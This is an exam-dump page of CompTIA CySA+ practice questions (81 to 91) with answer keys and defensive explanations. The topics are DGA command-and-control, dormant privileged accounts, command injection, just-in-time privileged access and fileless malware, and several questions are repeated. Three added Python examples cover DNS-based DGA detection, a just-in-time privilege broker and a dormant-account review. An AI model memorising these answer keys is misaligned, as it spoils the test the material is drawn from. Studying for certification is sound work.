CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 5 Q 81-100
Question 81
A SOC analyst identifies that multiple endpoints are communicating with an external IP address over an uncommon port, and these connections coincide with high volumes of DNS requests to seemingly random domains. Which of the following BEST describes the type of threat observed?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The indicators described in this scenario, uncommon outbound ports, multiple endpoints connecting to the same external IP address, and frequent DNS queries for randomized domains, are classic signs of malware using a domain generation algorithm for command-and-control. A DGA derives a large list of pseudo-random candidate domains from a seed (commonly the current date combined with a hard-coded value), so the operator, who knows the algorithm, registers only a few of the candidates while each bot walks the list until one resolves. Because the candidate set changes over time, static blocking with IP or domain blocklists is largely ineffective, and most of the queries end in NXDOMAIN responses, which is itself one of the strongest signals.
From a defensive perspective, monitoring these anomalies is critical. Analysts can detect DGA-based malware by analyzing DNS query patterns: the volume of requests per client, the length and character entropy of the queried names, and the ratio of NXDOMAIN responses to successful lookups. Combining DNS telemetry with endpoint data, network flow records, and intrusion detection system (IDS) alerts pins down which hosts are actually infected. Mitigation then means isolating the affected endpoints, blocking the domains and IP addresses that did resolve, and performing malware remediation, including memory and disk forensics to locate and remove any persistence mechanism.
DGA-based malware often uses legitimate tools and protocols, so it may never trigger signature-based antivirus. This emphasizes the importance of behavior-based detection, anomaly monitoring, and layered security controls. A defense-in-depth strategy, including endpoint detection and response (EDR), network segmentation, strict egress filtering, and forcing all DNS through an internal resolver that logs every query, limits the impact and prevents further propagation. Once a sample is identified, reverse engineering its DGA lets the team predict the upcoming domains and block or sinkhole them in advance.
B Standard software update traffic
Legitimate software updates contact known servers at predictable intervals on standard ports, and the hostnames they use resolve successfully and repeat from one update cycle to the next. CDN hostnames can look random, but they resolve; the defining feature of this scenario is the volume of lookups that fail. The activity described is inconsistent with normal update behavior.
C Distributed denial-of-service (DDoS) attack
A DDoS attack generates high-volume traffic targeting specific services to disrupt availability. In contrast, this scenario reflects covert communication and command-and-control behavior rather than service disruption.
D Misconfigured internal monitoring system
While misconfigurations can produce unusual traffic patterns, the combination of external communication, randomized DNS queries, and uncommon ports points strongly to malicious activity rather than benign misconfigurations.
Question 82
During an internal audit, a security analyst discovers that several privileged service accounts have not been used in more than six months but still possess administrative privileges. Which of the following controls would MOST effectively mitigate the associated risk?
A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access to privileged accounts
D) Deploy full disk encryption on all endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Inactive administrative accounts are a high-value target for attackers. Even when unused, they retain elevated privileges that can be abused if their credentials are stolen, guessed, or recovered during lateral movement, and service-account passwords are frequently long-lived and stored in configuration files. Automated account deprovisioning addresses this risk by disabling, and later removing, accounts after a defined period of inactivity, enforcing the principle of least privilege. Integrating automated account management into identity governance applies the policy consistently, reduces human error, and keeps orphaned or forgotten accounts from becoming an attack vector.
Automation also supports continuous compliance. PCI DSS explicitly requires inactive user accounts to be removed or disabled within 90 days, so accounts idle for six months already represent an audit finding; HIPAA and GDPR require appropriate access control more generally. Logging and auditing each deprovisioning action provides accountability and evidence for external audits. Automated deprovisioning also integrates with PAM solutions, which manage and record access to critical resources, adding another layer of protection for high-value accounts.
Two practical caveats apply to service accounts. First, disable before deleting and hold the disabled account for a quarantine period, because a dormant service account may still be referenced by a scheduled task, application pool, or integration that runs only occasionally; deleting it outright destroys its SID and makes rollback painful. Second, in Active Directory the lastLogonTimestamp attribute is only refreshed when it is more than 14 days stale, so inactivity calculations should allow for that slack. Beyond deprovisioning, MFA, lockout policies, usage monitoring, and periodic access reviews strengthen the posture, and correlating inactivity with endpoint telemetry confirms that dormant accounts are not quietly being used for persistence or lateral movement. Automated deprovisioning reduces risk while removing the manual reviews that are time-consuming and prone to oversight.
B Increase password complexity requirements for service accounts
Password complexity does not address the core issue, which is a dormant account with elevated privileges. A strong password offers no protection once the credential has been stolen, for example from a configuration file or a cached hash obtained during an internal compromise.
C Disable all external SSH access to privileged accounts
Restricting SSH access limits some attack vectors but does not prevent exploitation via local or lateral access methods.
D Deploy full disk encryption on all endpoints
Full disk encryption protects data at rest but does not mitigate the risks posed by unused administrative accounts.
Question 83
A web application is found to be vulnerable to OS-level command execution through unsanitized input fields. Which of the following is the MOST effective control to prevent this type of attack?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values for web applications
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
OS command injection occurs when user-supplied input is incorporated into a command line that the application hands to a shell, so metacharacters such as ;, |, && and $( ) in the input change what gets executed. Server-side input validation is the first control: checking input against the expected format, length, and character set (an allow list, not a deny list of bad characters) rejects malicious values before they reach the operating system. Parameterized execution is the second: invoke the program directly with an argument vector rather than building a shell string, so user data is passed as a discrete argument and is never parsed as code. This is the OS-command analogue of a prepared statement in SQL, and where a library API can do the job, calling it instead of an external program removes the problem entirely. Note that even the argument-vector form can be abused through argument injection (a value beginning with - being read as an option), which is why validation and parameterization are used together.
Implementing secure coding practices is critical to preventing command injection. Developers should follow application security frameworks and coding standards that emphasize input sanitization, secure function usage, and output encoding. Regular code reviews, static application security testing (SAST), and dynamic application security testing (DAST) can detect injection vulnerabilities early in the development lifecycle. Additionally, web application firewalls (WAFs) can provide an additional layer of protection by inspecting input for known patterns of malicious activity.
Logging and monitoring input validation failures can help detect attempts at exploitation, providing early warning signs to SOC teams. This allows security teams to proactively investigate attacks, mitigate vulnerabilities, and prevent the execution of malicious commands. The implementation of these controls protects sensitive data, preserves system integrity, and reduces the risk of unauthorized access or escalation to higher privileges.
B Enforce TLS encryption for all web traffic
TLS encrypts data in transit, ensuring confidentiality and integrity, but does not mitigate application-layer command injection attacks.
C Increase session timeout values for web applications
Session timeouts govern how long an idle session remains valid. Increasing them, if anything, widens the window for session hijacking; either way the setting has no bearing on command injection.
D Add additional firewall rules at the perimeter
Perimeter firewalls filter on addresses, ports, and protocols and do not parse the HTTP request body, so an injected payload inside a form field passes straight through. Only an application-aware control such as a WAF sees the input, and even a WAF is a compensating layer rather than a fix for the code.
Question 84
A SOC analyst identifies that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?
A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities
Answer A
Explanation:
A Implement privileged access management (PAM) with just-in-time (JIT) access
Privileged Access Management with JIT access is a proactive approach to securing high-privilege accounts. It grants administrative rights only when requested for a specific task, after approval and typically after MFA, and only for a defined duration; at all other times the account holds no standing administrative privilege. A stolen credential is then worth far less: an attacker who authenticates with it outside an approved window lands with ordinary rights and must go through the same logged elevation workflow to obtain more. PAM solutions also provide session recording, monitoring, and auditing, enhancing visibility and enabling rapid response to anomalous activity.
JIT access enforces the principle of least privilege, reducing the attack surface associated with high-privilege accounts. When combined with multi-factor authentication (MFA) and strong authentication policies, PAM effectively mitigates risks posed by credential compromise. Integration with identity governance and EDR systems ensures that any unusual activity is detected and alerts are triggered immediately.
Moreover, PAM provides detailed forensic records, which are critical for post-incident investigations. Analysts can track which accounts were used, what commands were executed, and whether any suspicious activity occurred during elevated sessions. By implementing PAM with JIT access, organizations maintain operational efficiency while significantly reducing the risk of compromise.
B Increase password complexity for all accounts
Strong passwords help prevent brute-force attacks but do not mitigate attacks using already stolen credentials.
C Deploy signature-based antivirus on the server
Traditional antivirus may detect known malware but is ineffective against reverse shells established using legitimate administrative tools.
D Disable all remote access capabilities
Disabling remote access entirely may disrupt operational workflows. PAM with JIT provides a controlled and secure alternative.
Question 85
A security analyst detects abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and are communicating with unknown external IP addresses. Antivirus scans do not identify any malicious files. Which of the following BEST describes the threat?
A) Fileless malware using living-off-the-land techniques
B) Standard ransomware encrypting local files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service attack
Answer A
Explanation:
A Fileless malware using living-off-the-land techniques
Fileless malware runs primarily in memory and uses legitimate administrative tooling such as PowerShell, WMI, or rundll32 to do its work; where it needs persistence it typically uses the registry, WMI event subscriptions, or scheduled tasks rather than dropping a binary. Because there is no malicious executable on disk to scan, traditional file-based antivirus has little to match on. Indicators include unusual script execution, obfuscated or encoded command lines, and outbound connections to unfamiliar IP addresses.
Living-off-the-land attacks utilize native system tools to minimize detection, often executing reconnaissance, lateral movement, or data exfiltration. Detection requires behavior-based monitoring, memory forensics, and endpoint detection and response (EDR) solutions that track anomalous script execution, unusual network traffic, and process behaviors. Isolating affected endpoints, analyzing scripts, and removing malicious processes are critical containment steps. Implementing application whitelisting, least privilege policies, and network segmentation further reduces the effectiveness of fileless malware.
B Standard ransomware encrypting local files
Ransomware typically leaves noticeable signs of file encryption, which is not described in this scenario.
C Phishing emails delivering malicious attachments
Phishing may be a delivery method, but the threat observed here involves post-compromise activity on endpoints.
D Distributed denial-of-service attack
DDoS attacks disrupt availability and do not involve obfuscated scripts or the outbound communication pattern described.
Question 86
A SOC analyst notices multiple endpoints attempting to connect to suspicious external IP addresses using unusual high-numbered ports. DNS logs also show a high number of queries for domains that appear to be randomly generated. Which of the following BEST describes the nature of the threat?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard patch management traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The pattern of multiple endpoints connecting to suspicious external IPs on high-numbered, uncommon ports, coupled with high-frequency DNS requests for seemingly random domains, strongly indicates malware employing a domain generation algorithm (DGA) to maintain command-and-control (C2) channels. DGAs are sophisticated techniques designed to avoid detection and blacklisting. By generating new, pseudo-random domain names periodically, malware ensures that even if some domains are blocked or taken down, it can still connect to operational C2 servers.
Detection of DGA-based malware requires correlation of multiple indicators. Analysts must review DNS query patterns for randomness, unusual lengths, or high entropy values, which differ from normal corporate DNS traffic. Network flow analysis can help identify unusual outbound connections to external IPs, particularly when endpoints that rarely communicate externally suddenly begin sending large amounts of traffic. Endpoint telemetry and behavior analytics are also critical for detecting DGA infections, as they provide context for script execution, process anomalies, and abnormal network connections.
Effective mitigation involves immediate isolation of affected endpoints to prevent further exfiltration and propagation. Blocking the malicious domains at the perimeter, together with blocking the IP addresses identified as C2 servers, disrupts the ongoing attack. Reverse engineering the DGA is often necessary to anticipate future domain names and block or sinkhole them proactively; a sinkhole then doubles as a detector, because any host that connects to it is infected. Fileless techniques are often combined with DGAs, so the malware may reside in memory and use legitimate system tools, making behavior-based detection crucial. A defense-in-depth approach, combining endpoint detection, SIEM correlation, network segmentation, and threat intelligence, ensures a resilient response to DGA-based threats.
B Standard patch management traffic
Legitimate patch management typically communicates with known update servers, on standard ports, and does not generate high-frequency randomized DNS queries.
C Distributed denial-of-service (DDoS) attack
DDoS attacks are characterized by overwhelming traffic to disrupt availability, rather than covert communication with C2 servers.
D Misconfigured internal monitoring system
While misconfigurations can generate unusual traffic, the combination of external communication, random domain resolution, and uncommon ports strongly indicates malicious intent.
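The DNS-side detection described for questions 81 and 86 (per-client query volume, NXDOMAIN ratio, and name entropy evaluated together), as an added worked example that is not part of the original page. The resolver log format, the sample lines, the client addresses and the thresholds are all constructed assumptions; the code also assumes the last label is the public suffix, which a production version would replace with a Public Suffix List lookup.

```python
"""Flag clients whose DNS behaviour looks like DGA beaconing (added example, not page code)."""
import math
from collections import defaultdict
from dataclasses import dataclass, field

# Thresholds are assumptions tuned to the constructed sample; baseline them on your own traffic.
MIN_QUERIES = 10       # too few queries to judge
NXDOMAIN_RATIO = 0.5   # most DGA candidates are unregistered and fail to resolve
MEAN_ENTROPY = 3.0     # bits per character over the non-suffix labels


@dataclass
class ClientStats:
    queries: int = 0
    nxdomain: int = 0
    domains: set = field(default_factory=set)
    entropies: list = field(default_factory=list)

    @property
    def nxdomain_ratio(self) -> float:
        return self.nxdomain / self.queries if self.queries else 0.0

    @property
    def mean_entropy(self) -> float:
        return sum(self.entropies) / len(self.entropies) if self.entropies else 0.0


def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character; 0.0 for an empty or single-symbol string."""
    n = len(s)
    if n == 0:
        return 0.0
    return -sum((k / n) * math.log2(k / n) for k in (s.count(c) for c in set(s)))


def name_body(qname: str) -> str:
    """Labels to score: everything except the last one. Assumption: the last label is the
    public suffix; production code should use the Public Suffix List (e.g. for 'co.uk')."""
    labels = qname.rstrip(".").lower().split(".")
    return "".join(labels[:-1]) if len(labels) > 1 else labels[0]


def summarise(lines):
    """Aggregate per-client statistics from '<ts> <client> <qname> <qtype> <rcode>' lines."""
    stats = defaultdict(ClientStats)
    for line in lines:
        parts = line.split()
        if len(parts) != 5:
            continue                      # skip blank or malformed lines
        _ts, client, qname, _qtype, rcode = parts
        st = stats[client]
        st.queries += 1
        st.domains.add(qname.lower())
        st.entropies.append(shannon_entropy(name_body(qname)))
        if rcode == "NXDOMAIN":
            st.nxdomain += 1
    return dict(stats)


def flag_dga_clients(lines):
    """Clients matching all three criteria; any one of them alone produces false positives."""
    return sorted(
        client for client, st in summarise(lines).items()
        if st.queries >= MIN_QUERIES
        and st.nxdomain_ratio >= NXDOMAIN_RATIO
        and st.mean_entropy >= MEAN_ENTROPY
    )


# Constructed sample: 10.0.0.5 is the infected host, 10.0.0.7 an ordinary workstation,
# 10.0.0.9 talks to hashed CDN hostnames that look random but resolve every time.
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z 10.0.0.7 www.microsoft.com A NOERROR",
    "2024-05-01T10:00:02Z 10.0.0.7 update.microsoft.com A NOERROR",
    "2024-05-01T10:00:03Z 10.0.0.7 login.microsoftonline.com A NOERROR",
    "2024-05-01T10:00:04Z 10.0.0.7 outlook.office365.com A NOERROR",
    "2024-05-01T10:00:05Z 10.0.0.7 www.google.com A NOERROR",
] + [
    f"2024-05-01T10:01:{i:02d}Z 10.0.0.9 cdn{i}x7q2w9e4r.cloudfront.net A NOERROR" for i in range(10)
] + [
    f"2024-05-01T10:02:{i:02d}Z 10.0.0.5 {d} A {'NOERROR' if i == 11 else 'NXDOMAIN'}"
    for i, d in enumerate([
        "kq3x9v2mz8pw.com", "h7g4tn5bxd1e.net", "zp2wq8fk6rjy.org", "b9vx3cmt7lqn.com",
        "r4jd8sw2yghk.info", "n6tq1zxc5vbp.com", "w8mk2hd9rfjz.net", "c3ys7nvq4tgb.org",
        "x5lp9rkw1dmq.com", "f2hz6gyn8tcw.com", "j7bq3xvd5kpl.net", "q9rw4mzt2hxv.com",
    ])
]

if __name__ == "__main__":
    for client, st in sorted(summarise(SAMPLE_LOG).items()):
        print(f"{client:9} queries={st.queries:3} nxdomain={st.nxdomain_ratio:.2f} "
              f"entropy={st.mean_entropy:.2f} unique={len(st.domains)}")
    print("flagged:", flag_dga_clients(SAMPLE_LOG))
```

Run against the sample, only 10.0.0.5 is flagged: it made 12 lookups of which 11 returned NXDOMAIN and the one success (q9rw4mzt2hxv.com) is the live C2 domain worth blocking. The CDN client scores higher on entropy than the infected one yet is never flagged because everything it asked for resolved, which is the point of requiring the criteria in combination rather than alerting on entropy alone.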
Question 87
An internal audit reveals several service accounts have not been used for more than six months but still have administrative privileges. Which of the following controls would MOST effectively mitigate this risk?
A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Service accounts that are inactive yet retain elevated privileges represent a high-value attack vector. Attackers can exploit these dormant accounts through credential theft, lateral movement, or brute-force attacks. Automated account deprovisioning ensures accounts are removed or disabled after a defined period of inactivity, enforcing the principle of least privilege and minimizing risk.
Automation reduces the human error of manual account reviews, applies security policy consistently, and produces an audit trail. Integrating automated deprovisioning with identity governance and privileged access management (PAM) systems enforces access lifecycle policies, keeps detailed logs, and allows rapid remediation when dormant accounts are discovered. It also supports compliance: PCI DSS requires inactive accounts to be removed or disabled within 90 days, and HIPAA and GDPR require that access to protected data be controlled and reviewed.
Beyond deprovisioning, other mitigating strategies include monitoring for unauthorized login attempts, enabling multi-factor authentication (MFA) for privileged accounts, and conducting periodic access reviews. Coordination with security operations ensures that any inactive accounts are logged and analyzed for potential misuse, further reducing attack surface exposure. Overall, automated account deprovisioning provides a scalable, consistent, and effective method to mitigate risks associated with dormant administrative accounts.
B Increase password complexity for service accounts
While strong passwords reduce the likelihood of brute-force attacks, they do not address the security risk posed by unused accounts retaining administrative privileges.
C Disable all external SSH access
Restricting external SSH access mitigates remote access attacks but does not prevent abuse of dormant accounts internally or through lateral movement.
D Deploy full disk encryption on endpoints
Full disk encryption protects data at rest but does not address vulnerabilities related to dormant accounts with administrative privileges.
Question 88
During a penetration test, testers exploit a web application vulnerability allowing OS-level command execution via unsanitized input parameters. Which of the following controls would BEST prevent this type of attack?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
OS command injection occurs when user input is incorporated into a command that is executed by the operating system, usually through a shell. Server-side input validation ensures input matches the expected type, length, and format (an allow list), rejecting values that carry shell metacharacters. Parameterized execution, passing the validated value as a separate argument to the program rather than interpolating it into a shell command line, keeps data apart from code; it plays the role for OS commands that prepared statements play for SQL.
Secure coding practices, such as input validation, output encoding, and the use of frameworks that enforce proper handling of user input, are essential. Continuous monitoring and logging of input validation failures provide early indicators of attack attempts. Regular code reviews, static application security testing (SAST), and dynamic application security testing (DAST) help identify vulnerabilities before they are exploited in production. Additionally, web application firewalls (WAFs) can provide an extra layer of defense by filtering malicious requests based on known attack patterns.
Implementing these controls reduces the risk of unauthorized command execution, preserves system integrity, and protects sensitive data, and it maps to PCI DSS secure-development requirements and to guidance such as the OWASP Top 10 and ASVS. Developer training on secure coding principles is also critical to prevent future vulnerabilities. Overall, server-side validation and parameterized execution are the primary, robust control against OS command injection.
B Enforce TLS encryption for all web traffic
TLS protects data in transit but does not mitigate application-layer input vulnerabilities such as command injection.
C Increase session timeout values
Session timeouts control how long an idle session remains valid; raising them does not improve security (shorter timeouts reduce the hijacking window) and has nothing to do with command injection.
D Add additional firewall rules at the perimeter
Perimeter firewalls do not parse application input and cannot stop a malicious command from executing within the application layer.
Question 89
A SOC analyst detects that a server has been compromised and a reverse shell has been established using stolen administrative credentials. Which of the following controls would MOST effectively prevent similar attacks in the future?
A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities
Answer A
Explanation:
A Implement privileged access management (PAM) with just-in-time (JIT) access
PAM with JIT access is highly effective in preventing attackers from leveraging stolen credentials. JIT access grants administrative privileges only for specific tasks and for a limited duration, reducing the window in which attackers can exploit credentials. PAM systems log and monitor all privileged sessions, providing visibility into suspicious activity and supporting forensic investigations.
The principle of least privilege is reinforced: users have elevated access only when necessary and cannot hold persistent administrative rights. Requiring MFA at the point of elevation means a stolen password alone is not enough to obtain an administrative session. PAM also helps meet compliance requirements by documenting every privileged access event, providing audit trails for security reviews, and supporting incident response.
Effective implementation of PAM reduces the risk of post-compromise attacks such as reverse shells, lateral movement, and data exfiltration. It also minimizes operational disruption because administrators retain access when necessary, unlike blanket restrictions that could hinder business functions. This proactive approach aligns with modern security best practices, combining prevention, detection, and response in a single control.
B Increase password complexity for all accounts
Strong passwords prevent brute-force attacks but do not prevent exploitation of credentials already stolen.
C Deploy signature-based antivirus on the server
Traditional antivirus may not detect reverse shells established using legitimate tools or memory-resident malware.
D Disable all remote access capabilities
While disabling remote access can prevent exploitation, it is operationally impractical. PAM with JIT access provides secure, controlled access without disrupting legitimate administrative tasks.
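The just-in-time elevation logic described for questions 84 and 89, as an added example that is not code from the page or from any PAM product. It models the control's decisions in memory (no standing membership, peer approval, MFA before elevation, time-boxed grants checked at use time, an audit trail); a real deployment delegates all of this to the PAM platform or IdP. The user names, roles, TTLs and the incident reference are assumptions.

```python
"""Just-in-time privilege broker: no standing admin rights, approved time-boxed grants, audit trail.

Added example, not code from the page. It models the control's decision logic in memory; a real
deployment delegates this to the PAM product or IdP. Names, roles and TTLs are assumptions.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import List, Set

MAX_TTL = timedelta(hours=4)   # hard cap regardless of what the requester asks for


@dataclass
class Grant:
    user: str
    role: str
    approver: str
    reason: str
    expires: datetime


@dataclass
class JitBroker:
    approvers: Set[str]
    grants: List[Grant] = field(default_factory=list)
    audit: List[str] = field(default_factory=list)

    def request(self, user, role, reason, approver, mfa_verified, now, ttl=timedelta(hours=1)) -> Grant:
        """Approve and grant in one call for brevity; rejects self-approval and unverified MFA."""
        if not mfa_verified:
            raise PermissionError("MFA must be completed before elevation")
        if approver == user or approver not in self.approvers:
            raise PermissionError("approver must be a different, authorised person")
        grant = Grant(user, role, approver, reason, now + min(ttl, MAX_TTL))
        self.grants.append(grant)
        self.audit.append(f"{now.isoformat()} GRANT {user} {role} by {approver} "
                          f"until {grant.expires.isoformat()} reason={reason!r}")
        return grant

    def is_elevated(self, user, role, now) -> bool:
        """Evaluated at use time: with no live grant the account has only ordinary rights."""
        live = any(g.user == user and g.role == role and g.expires > now for g in self.grants)
        self.audit.append(f"{now.isoformat()} CHECK {user} {role} -> {'allow' if live else 'deny'}")
        return live

    def revoke_expired(self, now) -> int:
        """Housekeeping: drop expired grants and record the expiry; returns how many were removed."""
        expired = [g for g in self.grants if g.expires <= now]
        self.grants = [g for g in self.grants if g.expires > now]
        self.audit.extend(f"{now.isoformat()} EXPIRE {g.user} {g.role}" for g in expired)
        return len(expired)


def scenario():
    """Walk through the stolen-credential case from the question; returns the observed outcomes."""
    t0 = datetime(2024, 6, 1, 9, 0, tzinfo=timezone.utc)
    broker = JitBroker(approvers={"bob", "carol"})
    out = {}
    # 1. An attacker holds alice's password, but there is no standing admin membership to use.
    out["stolen_cred_no_grant"] = broker.is_elevated("alice", "server-admin", t0)
    # 2. The attacker tries to approve an elevation request for alice as alice.
    try:
        broker.request("alice", "server-admin", "maintenance", approver="alice", mfa_verified=True, now=t0)
        out["self_approval"] = "allowed"
    except PermissionError:
        out["self_approval"] = "rejected"
    # 3. A legitimate, MFA-backed, peer-approved request for a one-hour window.
    broker.request("alice", "server-admin", "INC-1234 patch rollout", approver="bob", mfa_verified=True, now=t0)
    out["inside_window"] = broker.is_elevated("alice", "server-admin", t0 + timedelta(minutes=30))
    out["after_window"] = broker.is_elevated("alice", "server-admin", t0 + timedelta(hours=2))
    out["expired"] = broker.revoke_expired(t0 + timedelta(hours=2))
    out["audit"] = broker.audit
    return out


if __name__ == "__main__":
    for line in scenario()["audit"]:
        print(line)
```

The design point is in is_elevated: privilege is looked up against the grant ledger at the moment it is used, so a credential that was valid for an administrative session yesterday is an ordinary user credential today, and every allow and deny decision lands in the audit trail the investigators will need.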
Question 90
A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IP addresses. Antivirus scans do not detect any malicious files. Which of the following BEST describes the threat?
A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack
Answer A
Explanation:
A Fileless malware leveraging living-off-the-land techniques
Fileless malware runs primarily in memory and leaves no malicious binary on disk, which defeats signature-based antivirus that scans files. Where it persists, it does so through the registry, WMI event subscriptions, or scheduled tasks. These attacks use legitimate administrative tools such as PowerShell, WMI, or macro-launched scripts for reconnaissance, lateral movement, privilege escalation, or data exfiltration. Indicators include obfuscated scripts, unusual execution patterns, and communication with unknown external IPs.
Living-off-the-land attacks exploit built-in system utilities, allowing attackers to blend malicious activity with normal administrative operations. Detection requires behavior-based monitoring, memory analysis, and endpoint detection and response (EDR) solutions. Forensic investigation involves capturing memory dumps, analyzing scripts, and correlating network connections to identify compromised hosts. Mitigation includes isolating affected endpoints, removing malicious processes, implementing application whitelisting, enforcing least privilege policies, and using threat intelligence to detect known attack patterns.
B Standard ransomware encrypting files
Ransomware leaves distinct signs of file encryption, which is not observed in this scenario.
C Phishing emails delivering malicious attachments
While phishing could be an initial vector, the scenario involves active fileless malware executing in memory, not just delivery of malicious content.
D Distributed denial-of-service (DDoS) attack
DDoS attacks disrupt availability and do not involve obfuscated scripts or external command-and-control communication.
Question 91
A security analyst identifies that several service accounts have not been used for more than six months but still possess administrative privileges. Which of the following controls would MOST effectively mitigate the associated risk?
A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable external SSH access
D) Deploy full disk encryption on all endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Inactive accounts with administrative privileges are a high-value target for attackers, as they often go unnoticed while retaining extensive access to critical systems. Automated account deprovisioning mitigates this risk by systematically removing or disabling accounts that have been inactive for a predefined period. This process enforces the principle of least privilege, ensuring that only active users maintain access to sensitive systems, reducing the attack surface significantly.
Integration with identity governance and privileged access management (PAM) systems enhances the effectiveness of automated deprovisioning. These systems maintain centralized control over account lifecycles, produce audit logs, alert on anomalies, and support compliance obligations (PCI DSS sets a 90-day limit for inactive accounts; HIPAA and GDPR require that access be controlled and reviewed). Automating the process removes the reliance on manual account reviews, which are prone to human error, delay, and oversight.
Additionally, automated deprovisioning can be combined with risk-based access reviews, anomaly detection, and multi-factor authentication (MFA) to create a layered defense strategy. When accounts are deprovisioned, organizations reduce the risk of lateral movement, credential theft, and post-compromise attacks. This control also simplifies security operations by enabling proactive management rather than reactive responses after incidents occur. Continuous monitoring ensures dormant accounts do not remain in the environment, and alerting mechanisms can notify administrators if suspicious activity is detected, such as unauthorized attempts to access deprovisioned accounts.
B Increase password complexity for service accounts
While complex passwords reduce the likelihood of brute-force attacks, they do not eliminate the risks associated with dormant accounts that retain elevated privileges. Attackers could still leverage these accounts if credentials were stolen or previously compromised.
C Disable external SSH access
Disabling SSH for external access limits one attack vector but does not address threats originating internally, lateral movement, or misuse of dormant accounts.
D Deploy full disk encryption on all endpoints
Full disk encryption protects data at rest but does not mitigate risks associated with unused privileged accounts or credential misuse.
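The dormant-account policy discussed in questions 82, 87 and 91, as an added worked example that is not code from the page: a disable-first, delete-after-quarantine review that allows for never-used accounts still being commissioned, for accounts with no owner to confirm dependencies, and for the lag in Active Directory's lastLogonTimestamp. The inventory rows, owners, dates and thresholds are constructed assumptions; in practice the rows would come from an AD or IdP export.

```python
"""Dormant privileged-account review as policy code: disable first, delete after quarantine.

Added example, not code from the page. Account rows are constructed; in practice they come
from an AD or IdP export. Thresholds, names and owners are assumptions.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import List, Optional, Tuple

DISABLE_AFTER = timedelta(days=90)      # PCI DSS: inactive accounts removed/disabled within 90 days
QUARANTINE = timedelta(days=90)         # keep disabled before deleting so a missed dependency can be restored
NEW_ACCOUNT_GRACE = timedelta(days=30)  # never-used accounts get time to be commissioned
LASTLOGON_SLACK = timedelta(days=14)    # AD lastLogonTimestamp only refreshes when >14 days stale


@dataclass
class Account:
    name: str
    privileged: bool
    enabled: bool
    created: datetime
    last_logon: Optional[datetime]          # None = never logged on
    owner: Optional[str] = None
    disabled_on: Optional[datetime] = None


def decide(acct: Account, now: datetime) -> str:
    """Return 'keep', 'grace', 'disable', 'delete' or 'escalate' for one account."""
    if not acct.privileged:
        return "keep"                                   # this review covers privileged accounts only
    if not acct.enabled:
        if acct.disabled_on and now - acct.disabled_on >= QUARANTINE:
            return "delete"
        return "keep"                                   # still in quarantine (or disabled manually, undated)
    if acct.last_logon is None and now - acct.created < NEW_ACCOUNT_GRACE:
        return "grace"
    idle = now - (acct.last_logon or acct.created) - LASTLOGON_SLACK   # assume the timestamp may lag
    if idle < DISABLE_AFTER:
        return "keep"
    if acct.owner is None:
        return "escalate"                               # nobody can confirm dependencies; a human decides
    return "disable"


def apply_decisions(accounts: List[Account], now: datetime) -> Tuple[List[Account], List[str]]:
    """Enact the decisions, returning the surviving inventory and an audit trail."""
    remaining, audit = [], []
    for acct in accounts:
        action = decide(acct, now)
        audit.append(f"{now.date()} {action.upper():8} {acct.name} owner={acct.owner}")
        if action == "delete":
            continue
        if action == "disable":
            acct.enabled, acct.disabled_on = False, now
        remaining.append(acct)
    return remaining, audit


def sample_inventory() -> List[Account]:
    """Constructed inventory covering each branch of the policy."""
    def d(y, m, day):
        return datetime(y, m, day, tzinfo=timezone.utc)
    return [
        Account("svc_backup", True, True, d(2020, 3, 1), d(2023, 11, 15), owner="backup-team"),
        Account("svc_legacy_db", True, True, d(2019, 6, 1), d(2023, 10, 1)),
        Account("adm_jsmith", True, True, d(2021, 1, 10), d(2024, 5, 28), owner="jsmith"),
        Account("adm_newhire", True, True, d(2024, 5, 20), None, owner="it-ops"),
        Account("adm_old_never", True, True, d(2023, 1, 1), None, owner="it-ops"),
        Account("svc_retired", True, False, d(2018, 1, 1), d(2023, 6, 1), owner="app-team", disabled_on=d(2024, 1, 15)),
        Account("svc_recent_disabled", True, False, d(2018, 1, 1), d(2023, 12, 1), owner="app-team", disabled_on=d(2024, 4, 15)),
        Account("user_bob", False, True, d(2022, 1, 1), d(2023, 1, 1), owner="bob"),
    ]


NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)   # the review date, assumed


def review(now: datetime = NOW) -> dict:
    return {a.name: decide(a, now) for a in sample_inventory()}


if __name__ == "__main__":
    remaining, audit = apply_decisions(sample_inventory(), NOW)
    print("\n".join(audit))
    print("remaining:", [a.name for a in remaining])
```

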